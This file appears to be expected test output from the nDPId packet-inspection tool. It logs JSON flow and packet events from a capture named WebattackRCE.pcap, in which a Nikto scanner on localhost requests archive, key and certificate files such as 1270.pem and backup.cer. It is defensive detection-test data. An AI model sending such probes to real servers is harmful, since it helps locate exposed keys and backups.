-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277021,"pkt":"AAAAAAAAAAAAAAAACABFAADC3f5AAEAGXjV\/AAABfwAAAcNMH5AeDOWcmsl5CIAYAED+tgAAAQEICp1m\/EWdZvxFR0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277023,"pkt":"AAAAAAAAAAAAAAAACABFAAC9\/jtAAEAGPf1\/AAABfwAAAcNOH5DeVcZf0\/y26IAYAED+sQAAAQEICp1m\/EedZvxHR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277025,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VlRAAEAG5eR\/AAABfwAAAcNQH5CjGG47rGEO3YAYAED+sQAAAQEICp1m\/EmdZvxJR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277027,"pkt":"AAAAAAAAAAAAAAAACABFAADAghpAAEAGuht\/AAABfwAAAcNSH5AdH7pxZz3Y6IAYAED+tAAAAQEICp1m\/EudZvxLR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277028,"pkt":"AAAAAAAAAAAAAAAACABFAADA6xtAAEAGURp\/AAABfwAAAcNUH5DAadNxZUvEiYAYAED+tAAAAQEICp1m\/EydZvxMR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277029,"pkt":"AAAAAAAAAAAAAAAACABFAADAF9FAAEAGJGV\/AAABfwAAAcNWH5ByeS+n3HjH64AYAED+tAAAAQEICp1m\/E2dZvxNR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277031,"pkt":"AAAAAAAAAAAAAAAACABFAADASFpAAEAG89t\/AAABfwAAAcNYH5CIKHAy4FE5l4AYAED+tAAAAQEICp1m\/E+dZvxPR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277032,"pkt":"AAAAAAAAAAAAAAAACABFAAC9MI5AAEAGC6t\/AAABfwAAAcNaH5DGiQjnE8I6SoAYAED+sQAAAQEICp1m\/FCdZvxQR0VUIC8wLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277033,"pkt":"AAAAAAAAAAAAAAAACABFAAC9R6NAAEAG9JV\/AAABfwAAAcNcH5BSP3\/MbAOkN4AYAED+sQAAAQEICp1m\/FGdZvxRR0VUIC8wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277034,"pkt":"AAAAAAAAAAAAAAAACABFAADCi6hAAEAGsIt\/AAABfwAAAcNeH5CrCbPNtCCkdYAYAED+tgAAAQEICp1m\/FKdZvxSR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
